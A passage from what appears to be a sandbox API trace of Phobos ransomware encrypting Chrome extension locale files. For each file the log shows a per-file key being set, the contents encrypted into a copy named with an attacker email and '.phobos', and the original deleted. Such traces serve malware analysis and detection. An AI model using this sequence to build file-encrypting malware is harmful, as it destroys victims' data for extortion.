dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0149.807] ReadFile (in: hFile=0x190, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xfe, lpOverlapped=0x0) returned 1 [0149.808] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x100, dwBufLen=0x100 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x100) returned 1 [0149.808] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x100, lpOverlapped=0x0) returned 1 [0149.809] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32c28) returned 1 [0149.809] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0149.809] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0149.809] CryptDestroyKey (hKey=0xa32c28) returned 1 [0149.809] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0149.809] CryptDestroyKey (hKey=0xa32da8) returned 1 [0149.809] CloseHandle (hObject=0x190) returned 1 [0149.809] CloseHandle (hObject=0x148) returned 1 [0149.810] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\messages.json")) returned 1 [0149.811] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0149.811] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0149.811] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=227) returned 1 [0149.811] CloseHandle (hObject=0x148) returned 1 [0149.811] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\messages.json")) returned 0x2020 [0149.812] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0149.812] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0149.812] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0149.812] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0149.812] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0149.812] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32da8) returned 1 [0149.812] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0149.812] ReadFile (in: hFile=0x148, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xe3, lpOverlapped=0x0) returned 1 [0149.814] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xf0, dwBufLen=0xf0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xf0) returned 1 [0149.814] WriteFile (in: hFile=0x190, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf0, lpOverlapped=0x0) returned 1 [0149.893] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32c28) returned 1 [0149.893] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0149.893] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0149.893] CryptDestroyKey (hKey=0xa32c28) returned 1 [0149.893] WriteFile (in: hFile=0x190, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0149.893] CryptDestroyKey (hKey=0xa32da8) returned 1 [0149.893] CloseHandle (hObject=0x148) returned 1 [0149.893] CloseHandle (hObject=0x190) returned 1 [0149.893] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\messages.json")) returned 1 [0149.894] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0149.894] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0149.895] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=264) returned 1 [0149.895] CloseHandle (hObject=0x190) returned 1 [0149.895] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\messages.json")) returned 0x2020 [0149.895] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0149.895] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0149.895] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0149.895] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0149.895] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0149.896] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32da8) returned 1 [0149.896] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0149.896] ReadFile (in: hFile=0x190, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x108, lpOverlapped=0x0) returned 1 [0149.897] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x110, dwBufLen=0x110 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x110) returned 1 [0149.897] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x110, lpOverlapped=0x0) returned 1 [0149.898] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32c28) returned 1 [0149.898] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0149.898] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0149.898] CryptDestroyKey (hKey=0xa32c28) returned 1 [0149.898] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0149.898] CryptDestroyKey (hKey=0xa32da8) returned 1 [0149.898] CloseHandle (hObject=0x190) returned 1 [0149.898] CloseHandle (hObject=0x148) returned 1 [0149.899] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\messages.json")) returned 1 [0149.900] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0149.900] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0149.900] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=225) returned 1 [0149.900] CloseHandle (hObject=0x148) returned 1 [0149.900] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\messages.json")) returned 0x2020 [0149.900] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0149.901] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0149.901] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0149.901] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0149.901] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0149.901] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32da8) returned 1 [0149.901] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0149.901] ReadFile (in: hFile=0x148, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xe1, lpOverlapped=0x0) returned 1 [0149.902] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xf0, dwBufLen=0xf0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xf0) returned 1 [0149.902] WriteFile (in: hFile=0x190, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf0, lpOverlapped=0x0) returned 1 [0149.903] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32c28) returned 1 [0149.903] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0149.903] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0149.903] CryptDestroyKey (hKey=0xa32c28) returned 1 [0149.903] WriteFile (in: hFile=0x190, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0149.903] CryptDestroyKey (hKey=0xa32da8) returned 1 [0149.903] CloseHandle (hObject=0x148) returned 1 [0149.904] CloseHandle (hObject=0x190) returned 1 [0149.904] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\messages.json")) returned 1 [0149.905] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0149.905] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_cn\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0149.905] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=206) returned 1 [0149.905] CloseHandle (hObject=0x190) returned 1 [0149.905] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_cn\\messages.json")) returned 0x2020 [0149.905] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_CN\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_cn\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0149.905] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_cn\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0149.906] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0149.906] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0149.906] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_CN\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_cn\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0149.906] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32da8) returned 1 [0149.906] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0149.906] ReadFile (in: hFile=0x190, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xce, lpOverlapped=0x0) returned 1 [0149.907] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xd0, dwBufLen=0xd0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xd0) returned 1 [0149.907] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xd0, lpOverlapped=0x0) returned 1 [0149.908] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32c28) returned 1 [0149.908] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0149.908] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0149.908] CryptDestroyKey (hKey=0xa32c28) returned 1 [0149.908] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0149.908] CryptDestroyKey (hKey=0xa32da8) returned 1 [0149.908] CloseHandle (hObject=0x190) returned 1 [0149.908] CloseHandle (hObject=0x148) returned 1 [0149.908] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_cn\\messages.json")) returned 1 [0149.909] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0149.909] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 